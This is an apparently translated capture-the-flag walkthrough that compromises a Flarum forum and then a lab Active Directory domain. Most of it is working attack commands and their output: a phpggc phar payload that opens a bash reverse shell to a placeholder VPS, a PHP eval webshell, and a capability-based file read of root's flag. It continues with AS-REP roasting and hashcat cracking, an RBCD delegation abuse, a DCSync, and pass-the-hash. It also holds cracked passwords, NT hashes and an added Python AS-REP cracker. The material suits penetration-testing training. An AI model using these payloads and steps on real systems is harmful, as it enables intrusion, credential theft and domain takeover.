flag01
Scan with fscan first.
It is a Flarum forum.
The username is administrator (or administrator@xiaorang.lab).
Brute-forced the password with rockyou.txt (takes a long time): administrator/1chris
Next, follow p牛 (phith0n)'s blog to get RCE. First grab phpggc, a PHP deserialization payload generator similar to ysoserial for Java. To keep the file header under our control we have phpggc emit a tar-format phar whose payload is a reverse-shell command:
php phpggc -p tar -b Monolog/RCE6 system "bash -c 'bash -i >& /dev/tcp/vps/port 0>&1'"
./phpggc -p tar -b Monolog/RCE6 system "bash -c 'bash -i >& /dev/tcp/vps/port 0>&1'" # this invocation ran for a very long time and never returned
If you get Cannot create phar: phar.readonly is set to 1, change that setting as the referenced article describes; the usual way is to run phpggc through php with -d phar.readonly=0, since phar.readonly cannot be lowered with ini_set() from inside a script.
Copy the base64 output into the custom CSS field in the admin panel, in place of the …… in the line below. Flarum's LESS compiler inlines the data: URI, so the raw phar bytes end up inside the compiled stylesheet:
@import (inline) 'data:text/css;base64,……';
Then fetch http://39.xx.xx.xx/assets/forum.css to confirm the compiled CSS now contains the payload.
Next edit the custom CSS again so that the file we just poisoned is read through the phar:// wrapper; data-uri() makes PHP open the path, and the phar wrapper unserializes the archive metadata, firing the Monolog gadget chain:
.test {
content: data-uri('phar://./assets/forum.css');
}
That returns a shell.
Drop a webshell for AntSword (only /var/www/html/public/assets is writable; the same holds for the later file uploads):
echo "<?php @eval(\$_POST[1]);?>" > 1.php
Connect AntSword to http://39.xx.xx.xx/assets/1.php
Privilege escalation
getcap -r / 2>/dev/null
openssl carries a file capability (getcap shows it; typically cap_dac_read_search, which bypasses read-permission checks), so it can read root's files directly, which yields flag01:
openssl enc -in "/root/flag/flag01.txt"
flag03
Upload fscan and frp and start a proxy.
Information gathering (fscan shows no output when launched from AntSword):
172.22.60.42:445 open
172.22.60.15:445 open
172.22.60.42:139 open
172.22.60.8:139 open
172.22.60.15:139 open
172.22.60.42:135 open
172.22.60.15:135 open
172.22.60.8:135 open
172.22.60.52:80 open
172.22.60.52:22 open
172.22.60.52:8084 open
172.22.60.52:8083 open
172.22.60.8:88 open
172.22.60.8:445 open
172.22.60.52:8080 open
[*] NetInfo:
[*]172.22.60.15
[->]PC1
[->]172.22.60.15
[->]169.254.204.42
[*] NetBios: 172.22.60.15 XIAORANG\PC1
[*] NetBios: 172.22.60.8 [+]DC XIAORANG\DC
[*] NetInfo:
[*]172.22.60.42
[->]Fileserver
[->]172.22.60.42
[->]169.254.134.157
[*] WebTitle: https://172.22.60.52:8080 code:200 len:260 title:None
[*] NetInfo:
[*]172.22.60.8
[->]DC
[->]172.22.60.8
[->]169.254.114.245
[*] WebTitle: https://172.22.60.52:8084 code:200 len:260 title:None
[*] NetBios: 172.22.60.42 XIAORANG\FILESERVER
[*] WebTitle: https://172.22.60.52:8083 code:200 len:260 title:None
[*] WebTitle: http://172.22.60.52 code:200 len:5867 title:霄壤社区
This gives:
172.22.60.52 this host (the Flarum box)
172.22.60.15 PC1, domain member
172.22.60.42 Fileserver, domain member
172.22.60.8 DC, domain controller
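Added example (my code, not the post's or fscan's): a Python parser that turns the raw fscan lines above into the same per-host summary, so the inventory does not have to be compiled by hand. The sample input is a constructed subset of the output shown above; roles are inferred from fscan's NetBios lines ([+]DC marks the DC, a DOMAIN\NAME prefix marks a domain member), so the foothold host, which has no NetBios line, comes out with no role.

```python
"""Turn raw fscan output into a per-host inventory (added example, not fscan's code)."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"
PORT_RE = re.compile(r"^(" + IPV4 + r"):(\d+) open$")           # "172.22.60.8:88 open"
NETINFO_HOST_RE = re.compile(r"^\[\*\](" + IPV4 + r")$")        # "[*]172.22.60.15"
NETINFO_ITEM_RE = re.compile(r"^\s*\[->\](\S+)$")               # "[->]PC1", "[->]169.254.204.42"
NETBIOS_RE = re.compile(r"^\[\*\] NetBios: (\S+) (\[\+\]DC )?(\S+)$")
WEB_RE = re.compile(r"^\[\*\] WebTitle: (\S+) code:(\d+) len:(\d+) title:(.*)$")
IPV4_RE = re.compile(r"^" + IPV4 + r"$")

# Constructed sample: a subset of the fscan output shown above.
SAMPLE_FSCAN = r"""
172.22.60.42:445 open
172.22.60.15:445 open
172.22.60.8:88 open
172.22.60.8:445 open
172.22.60.52:80 open
172.22.60.52:22 open
[*] NetInfo:
[*]172.22.60.15
[->]PC1
[->]172.22.60.15
[->]169.254.204.42
[*] NetBios: 172.22.60.15 XIAORANG\PC1
[*] NetBios: 172.22.60.8 [+]DC XIAORANG\DC
[*] NetInfo:
[*]172.22.60.42
[->]Fileserver
[->]172.22.60.42
[*] WebTitle: https://172.22.60.52:8080 code:200 len:260 title:None
[*] NetInfo:
[*]172.22.60.8
[->]DC
[->]172.22.60.8
[*] NetBios: 172.22.60.42 XIAORANG\FILESERVER
[*] WebTitle: http://172.22.60.52 code:200 len:5867 title:霄壤社区
"""


def new_host():
    return {"hostname": None, "domain": None, "dc": False,
            "ports": set(), "addrs": set(), "web": []}


def parse_fscan(text):
    """Return {ip: {hostname, domain, dc, ports, addrs, web}} from fscan's stdout."""
    hosts = defaultdict(new_host)
    current = None                                    # IP whose NetInfo block is open
    for line in text.splitlines():
        line = line.rstrip()
        if m := PORT_RE.match(line):
            hosts[m[1]]["ports"].add(int(m[2]))
        elif m := NETINFO_HOST_RE.match(line):
            current = m[1]
            continue                                  # keep the NetInfo block open
        elif (m := NETINFO_ITEM_RE.match(line)) and current:
            item = m[1]
            if IPV4_RE.match(item):
                hosts[current]["addrs"].add(item)
            elif hosts[current]["hostname"] is None:  # first non-IP item is the hostname
                hosts[current]["hostname"] = item
            continue
        elif m := NETBIOS_RE.match(line):
            h = hosts[m[1]]
            h["dc"] = h["dc"] or m[2] is not None     # "[+]DC" flag from fscan
            if "\\" in m[3]:                          # DOMAIN\NAME => domain-joined
                h["domain"], name = m[3].split("\\", 1)
                h["hostname"] = h["hostname"] or name
        elif m := WEB_RE.match(line):
            hosts[urlsplit(m[1]).hostname]["web"].append(
                {"url": m[1], "code": int(m[2]), "title": m[4]})
        current = None                                # any other line closes the block
    return {ip: {**h, "ports": sorted(h["ports"]), "addrs": sorted(h["addrs"])}
            for ip, h in hosts.items()}


def summarize(hosts):
    """One line per host, DCs first, in the shape of the hand-made table above."""
    def key(ip):
        return (not hosts[ip]["dc"], tuple(int(o) for o in ip.split(".")))
    out = []
    for ip in sorted(hosts, key=key):
        h = hosts[ip]
        role = "DC" if h["dc"] else ("domain member" if h["domain"] else "no NetBIOS info")
        ports = ",".join(str(p) for p in h["ports"])
        out.append(f"{ip:<14} {h['hostname'] or '?':<12} {h['domain'] or '-':<9} {role:<15} ports={ports}")
    return out


if __name__ == "__main__":
    print("\n".join(summarize(parse_fscan(SAMPLE_FSCAN))))
```

Feed it the full fscan output (for example `parse_fscan(open("fscan.txt").read())`) and the summary is what the table above shows; port 88 on a host with the [+]DC flag is the Kerberos KDC to point GetNPUsers and BloodHound at.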
The database password is in config.php:
root/Mysql@root123
Connect to it with AntSword.
Export the usernames from the flarum users table and run AS-REP Roasting against them:
proxychains impacket-GetNPUsers -dc-ip 172.22.60.8 xiaorang.lab/ -usersfile flarum_users.txt
Two hashes come back:
'$krb5asrep$23$zhangxin@XIAORANG.LAB:b505f6f8f88b922532bb16ca201e40db$096140933263872ea92b3fb76cd2ee4e85e53bc3d1a84f652a484cc15cc55312399b6ea32da1d6d81b9f59a52890ec5b63fa2c133cafdc0aef37448f969784805528c0f2cb9e7c86d0b644eeddef544a1c29bedc788c6072e0dd4de1625a3f9ee31b4d0a8a18946bc0e59c8c7ea3c6884b28812d4d1a74382a67b19ff26923d3fe4a856c85b08434682c3c303b30577b503d174a82d3223f2b8971d0dbe75f5b7ace377fd1912a3fa5665da3d627dd650ed2abffbc853569ba48a2c3511ee7eed5cacbb3e5af0a258a61689529929542c062754d95b918d0d5ebbe8f4e6795879e69eea2335f6796b2297eb1'
'$krb5asrep$23$wangyun@XIAORANG.LAB:a2452cf31a79b10862f618f1b640afaf$045cd13b5cda191cc51b4b598ae617a2fb2a95d4646a95aeea1b1e20922d7a47f7ad24915714a9c5a243022fabefa0dd2e421d9502cddc17178dae58f54ec50f4d81b0bc082a7334673c623156dbf45c4fe4e2ab3d588c0d24fada9c62ca051e8dc9737069ea3505bf6fd7e21a7bcc82cd5070eab42efcc809a2bb2767c3e97c675553ca5acca6cf9b1872462756055a2512d69db7ef2a9e38c0873af757fd963bc941224ca71627773a28f3740f71c4bb4ebfae37e9e01da6ba7dfef37119df61e53dcb7edf82b3e89b344568b17d87effb105f30c5a87ee592555e5966dee4709742cedabfd86092f05056'
Crack them:
hashcat -a 0 -m 18200 --force hash.txt rockyou.txt
Only one cracks; zhangxin's does not.
wangyun/Adm12geC
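Added example (mine, not the post's): what hashcat mode 18200 actually does with a $krb5asrep$23$ line. The hash is checksum || RC4(K3, confounder || EncASRepPart), with K = NTLM(password), K1 = HMAC-MD5(K, key usage 8 as a little-endian 32-bit integer), K3 = HMAC-MD5(K1, checksum); a password is correct when HMAC-MD5(K1, decrypted data) equals the checksum. The pure-Python MD4 is a fallback for Python builds whose OpenSSL no longer provides md4. WANGYUN_HASH is the wangyun line captured above; forge_asrep() and its test principal are constructed self-check data, not AD output.

```python
"""Check a password against an AS-REP roast hash the way hashcat -m 18200 does."""
import hashlib
import hmac
import re
import struct

M32 = 0xFFFFFFFF


def _md4(data):
    """Pure-Python MD4 (RFC 1320) for Python builds whose OpenSSL has dropped md4."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & M32
    def F(x, y, z): return (x & y) | (~x & z)
    def G(x, y, z): return (x & y) | (x & z) | (y & z)
    def H(x, y, z): return x ^ y ^ z
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):                                                   # round 1
            t = rotl((a + F(b, c, d) + X[i]) & M32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, t, b, c
        for i in range(16):                                                   # round 2
            t = rotl((a + G(b, c, d) + X[(i % 4) * 4 + i // 4] + 0x5A827999) & M32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, t, b, c
        for i, k in enumerate((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)):  # round 3
            t = rotl((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & M32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, t, b, c
        a0, b0, c0, d0 = (a0 + a) & M32, (b0 + b) & M32, (c0 + c) & M32, (d0 + d) & M32
    return struct.pack("<4I", a0, b0, c0, d0)


def ntlm_hash(password):
    """NT hash = MD4(UTF-16LE(password)); it is also the RC4-HMAC Kerberos key."""
    data = password.encode("utf-16le")
    try:
        return hashlib.new("md4", data).digest()
    except ValueError:                      # "unsupported hash type md4" on OpenSSL 3
        return _md4(data)


def _rc4(key, data):
    S = list(range(256))
    j = 0
    for i in range(256):                    # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                       # keystream generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key, msg):
    return hmac.new(key, msg, hashlib.md5).digest()


ASREP_RE = re.compile(r"^\$krb5asrep\$23\$([^:]+):([0-9a-fA-F]{32})\$([0-9a-fA-F]+)$")
KEY_USAGE_ASREP = struct.pack("<I", 8)      # RFC 4757 T value; Windows uses usage 8 for the AS-REP enc-part


def verify_asrep(hashline, password):
    """True if `password` decrypts the AS-REP enc-part in a $krb5asrep$23$ line."""
    m = ASREP_RE.match(hashline.strip())
    if m is None:
        raise ValueError("not a $krb5asrep$23$ (RC4-HMAC) line")
    checksum, edata = bytes.fromhex(m[2]), bytes.fromhex(m[3])
    k1 = _hmac_md5(ntlm_hash(password), KEY_USAGE_ASREP)
    k3 = _hmac_md5(k1, checksum)
    plain = _rc4(k3, edata)                 # 8-byte confounder || EncASRepPart (DER)
    return hmac.compare_digest(_hmac_md5(k1, plain), checksum)


def crack_asrep(hashline, candidates):
    """Minimal dictionary attack; returns the first matching password or None."""
    return next((pw for pw in candidates if verify_asrep(hashline, pw)), None)


def forge_asrep(principal, password, enc_part, confounder=b"\x00" * 8):
    """Build a line in the same format from known inputs (constructed test data, not AD output)."""
    k1 = _hmac_md5(ntlm_hash(password), KEY_USAGE_ASREP)
    data = confounder + enc_part
    checksum = _hmac_md5(k1, data)
    edata = _rc4(_hmac_md5(k1, checksum), data)
    return f"$krb5asrep$23${principal}:{checksum.hex()}${edata.hex()}"


# The wangyun line captured above (the zhangxin line is handled the same way).
WANGYUN_HASH = "$krb5asrep$23$wangyun@XIAORANG.LAB:a2452cf31a79b10862f618f1b640afaf$045cd13b5cda191cc51b4b598ae617a2fb2a95d4646a95aeea1b1e20922d7a47f7ad24915714a9c5a243022fabefa0dd2e421d9502cddc17178dae58f54ec50f4d81b0bc082a7334673c623156dbf45c4fe4e2ab3d588c0d24fada9c62ca051e8dc9737069ea3505bf6fd7e21a7bcc82cd5070eab42efcc809a2bb2767c3e97c675553ca5acca6cf9b1872462756055a2512d69db7ef2a9e38c0873af757fd963bc941224ca71627773a28f3740f71c4bb4ebfae37e9e01da6ba7dfef37119df61e53dcb7edf82b3e89b344568b17d87effb105f30c5a87ee592555e5966dee4709742cedabfd86092f05056"

if __name__ == "__main__":
    print("wangyun / Adm12geC ->", verify_asrep(WANGYUN_HASH, "Adm12geC"))
    print("wangyun / Password1 ->", verify_asrep(WANGYUN_HASH, "Password1"))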
Remote desktop into 172.22.60.15 with
wangyun@xiaorang.lab/Adm12geC
Run BloodHound:
proxychains python3 bloodhound.py -u wangyun -p Adm12geC -d xiaorang.lab -c all -ns 172.22.60.8 --zip --dns-tcp
Analysis:
The FILESERVER machine account holds DCSync rights (replication rights over the domain).
zhangxin is a member of Account Operators and so has GenericAll over every computer object in the domain except the domain controllers.
So the plan is: use zhangxin to configure RBCD on FILESERVER, impersonate Administrator to it, dump the FILESERVER$ hash and DCSync with that to take the DC.
Looking at the wangyun user's machine, there is an Xshell install whose saved session also stores zhangxin's password; SharpXDecrypt extracts it (instantly):
Recovered password:
UserName: zhangxin
Password: admin4qwY38cc
Now for the RBCD attack.
Method one:
Following the section on taking over a host as an Account Operators member in 域渗透之委派攻击全集 (the domain delegation attack compendium).
Powermad.ps1-->https://github.com/Kevin-Robertson/Powermad/blob/master/Powermad.ps1
Configure as in that blog post (the SID in the security descriptor below is the objectSid of the new test machine account, as returned by Get-NetComputer):
> Set-ExecutionPolicy Bypass -Scope Process
[Y] Yes(Y) [A] Yes to All(A) [N] No(N) [L] No to All(L) [S] Suspend(S) [?] Help (default is "N"): Y
> import-module .\Powermad.ps1
> New-MachineAccount -MachineAccount test -Password $(ConvertTo-SecureString "123456" -AsPlainText -Force)
> import-module .\powerview.ps1
> Get-NetComputer test -Properties objectsid
> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3535393121-624993632-895678587-1116)"
> $SDBytes = New-Object byte[] ($SD.BinaryLength)
> $SD.GetBinaryForm($SDBytes, 0)
> Get-DomainComputer Fileserver| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
It errored? (Thinking about it afterwards, probably because I was on the campus network; a mobile hotspot should have worked.)
Edit /etc/hosts on Kali and add the hosts (Kerberos needs the FQDNs to resolve):
172.22.60.15 PC1.xiaorang.lab
172.22.60.42 FILESERVER.xiaorang.lab
172.22.60.8 DC.xiaorang.lab
Request the service ticket and connect without a password (this failed for me because of the error above):
proxychains python3 getST.py -dc-ip 172.22.60.8 xiaorang.lab/test\$:123456 -spn cifs/Fileserver.xiaorang.lab -impersonate administrator
export KRB5CCNAME=administrator.ccache
proxychains python3 psexec.py Administrator@FILESERVER.xiaorang.lab -k -no-pass -dc-ip 172.22.60.8 -codec gbk
Method two (pure impacket):
proxychains python3 addcomputer.py xiaorang.lab/zhangxin:'admin4qwY38cc' -dc-ip 172.22.60.8 -dc-host xiaorang.lab -computer-name 'TEST2$' -computer-pass 'P@ssw0rd'
proxychains python3 rbcd.py xiaorang.lab/zhangxin:'admin4qwY38cc' -dc-ip 172.22.60.8 -action write -delegate-to 'Fileserver$' -delegate-from 'TEST2$'
proxychains python3 getST.py xiaorang.lab/'TEST2$':'P@ssw0rd' -spn cifs/Fileserver.xiaorang.lab -impersonate Administrator -dc-ip 172.22.60.8
export KRB5CCNAME=Administrator.ccache
Edit /etc/hosts as above.
Connect without a password:
proxychains python3 psexec.py Administrator@FILESERVER.xiaorang.lab -k -no-pass -dc-ip 172.22.60.8 -codec gbk
flag02 & flag04
Dump FILESERVER's hashes:
proxychains python3 secretsdump.py -k -no-pass Fileserver.xiaorang.lab -dc-ip 172.22.60.8
It errored?
Running the distro-packaged impacket-secretsdump instead works, oddly enough:
proxychains impacket-secretsdump -k -no-pass FILESERVER.xiaorang.lab -dc-ip 172.22.60.8
Hash obtained:
XIAORANG\Fileserver$:951d8a9265dfb652f42e5c8c497d70dc
DCSync with the Fileserver machine account hash to get the domain Administrator hash (-just-dc-user limits the dump to that one account):
proxychains python3 secretsdump.py xiaorang.lab/'Fileserver$':@172.22.60.8 -hashes ':951d8a9265dfb652f42e5c8c497d70dc' -just-dc-user Administrator
Administrator NT hash: c3cfdc08527ec4ab6aa3e630e79d349b
Pass-the-hash to the DC to grab its flag:
proxychains python3 wmiexec.py -hashes :c3cfdc08527ec4ab6aa3e630e79d349b Administrator@172.22.60.8 -codec gbk
Pass-the-hash to PC1 (172.22.60.15) the same way for the other flag:
proxychains python3 wmiexec.py -hashes :c3cfdc08527ec4ab6aa3e630e79d349b xiaorang.lab/Administrator@172.22.60.15 -codec gbk